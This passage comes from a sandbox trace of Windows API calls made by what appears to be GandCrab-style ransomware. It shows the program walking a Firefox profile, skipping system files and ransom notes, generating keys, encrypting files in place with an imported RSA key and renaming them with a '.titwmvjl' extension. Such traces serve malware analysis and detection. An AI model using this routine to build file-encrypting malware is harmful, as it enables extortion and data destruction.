flProtect=0x4) returned 0x2310000 [0082.439] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".lib ") returned 5 [0082.439] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.439] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.440] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2dc [0082.440] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.440] ReadFile (in: hFile=0x2dc, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e264*=0x21c, lpOverlapped=0x0) returned 1 [0082.457] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.457] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.457] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.461] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.462] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.462] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.462] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e220 | out: pbBuffer=0x259e220) returned 1 [0082.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.462] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.462] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.462] CryptAcquireContextW (in: phProv=0x259e194, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e194*=0x4c9980) returned 1 [0082.466] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.466] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.467] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.467] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e240 | out: pbBuffer=0x259e240) returned 1 [0082.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.467] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.467] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.467] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.467] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.471] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x503438) returned 1 [0082.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.471] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.472] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.472] GetLastError () returned 0x0 [0082.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.472] CryptDestroyKey (hKey=0x503438) returned 1 [0082.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.472] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.473] CryptAcquireContextW (in: phProv=0x259e188, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e188*=0x4c9980) returned 1 [0082.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.477] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e18c | out: phKey=0x259e18c*=0x5031f8) returned 1 [0082.477] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.477] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259e180, pdwDataLen=0x259e184, dwFlags=0x0 | out: pbData=0x259e180*=0x800, pdwDataLen=0x259e184*=0x4) returned 1 [0082.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.478] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e1b8*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e1b8*=0x100) returned 1 [0082.478] GetLastError () returned 0x0 [0082.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.478] CryptDestroyKey (hKey=0x5031f8) returned 1 [0082.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.479] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.479] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.479] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.479] ReadFile (in: hFile=0x2dc, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e264, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e264*=0x9a8, lpOverlapped=0x0) returned 1 [0082.486] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0xfffff658, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.486] WriteFile (in: hFile=0x2dc, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x9a8, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e248*=0x9a8, lpOverlapped=0x0) returned 1 [0082.488] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.488] WriteFile (in: hFile=0x2dc, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e248, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e248*=0x21c, lpOverlapped=0x0) returned 1 [0082.490] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.495] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.495] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.495] CloseHandle (hObject=0x2dc) returned 1 [0082.496] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.titwmvjl"), dwFlags=0x1) returned 1 [0082.497] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.498] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e318 | out: lpFindFileData=0x259e318) returned 0 [0082.498] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0082.499] CloseHandle (hObject=0x248) returned 1 [0082.499] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.499] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0082.499] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0082.499] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock" [0082.499] lstrlenW (lpString=".titwmvjl") returned 9 [0082.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.499] VirtualAlloc (lpAddress=0x0, dwSize=0x130, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.499] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 129 [0082.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.499] lstrlenW (lpString=".lock") returned 5 [0082.499] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.500] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0082.500] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.500] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.500] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0082.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0082.500] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt" [0082.500] lstrlenW (lpString=".titwmvjl") returned 9 [0082.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt") returned 116 [0082.500] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.501] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 125 [0082.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt") returned 116 [0082.501] lstrlenW (lpString=".txt") returned 4 [0082.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.501] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".txt ") returned 5 [0082.501] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0082.501] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt") returned 116 [0082.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\TITWMVJL-DECRYPT.txt") returned 116 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0082.502] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0082.502] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.502] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0082.502] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0082.503] CloseHandle (hObject=0x2d4) returned 1 [0082.503] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.504] lstrcmpW (lpString1="key3.db", lpString2=".") returned 1 [0082.504] lstrcmpW (lpString1="key3.db", lpString2="..") returned 1 [0082.504] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" [0082.504] lstrlenW (lpString=".titwmvjl") returned 9 [0082.504] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0082.504] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.504] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db.titwmvjl") returned 96 [0082.504] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0082.504] lstrlenW (lpString=".db") returned 3 [0082.504] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.504] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".db ") returned 4 [0082.504] lstrcmpiW (lpString1=".db", lpString2=".titwmvjl") returned -1 [0082.504] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.505] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0082.505] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="desktop.ini") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="autorun.inf") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="iconcache.db") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="bootsect.bak") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="boot.ini") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat.log") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="thumbs.db") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="KRAB-DECRYPT.html") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="CRAB-DECRYPT.html") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="ntldr") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="NTDETECT.COM") returned -1 [0082.505] lstrcmpiW (lpString1="key3.db", lpString2="Bootfont.bin") returned 1 [0082.505] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0082.505] lstrlenW (lpString=".db") returned 3 [0082.505] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.505] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".db ") returned 4 [0082.505] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.506] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.506] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.507] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.507] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0082.508] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.508] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.509] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.513] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.513] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.514] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.514] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.514] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.514] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.514] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.518] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.518] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.518] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.518] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0082.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.519] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.519] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.519] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.519] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.523] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0082.523] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.524] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.524] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.524] GetLastError () returned 0x0 [0082.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.524] CryptDestroyKey (hKey=0x503578) returned 1 [0082.524] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.525] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.525] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.529] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503938) returned 1 [0082.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.529] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.529] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.530] GetLastError () returned 0x0 [0082.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.530] CryptDestroyKey (hKey=0x503938) returned 1 [0082.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.530] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.530] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.530] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.531] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x4000, lpOverlapped=0x0) returned 1 [0082.544] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffc000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.544] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x4000, lpOverlapped=0x0) returned 1 [0082.545] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.545] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0082.625] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.628] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.629] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.629] CloseHandle (hObject=0x2d4) returned 1 [0082.629] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db.titwmvjl" (normalized: 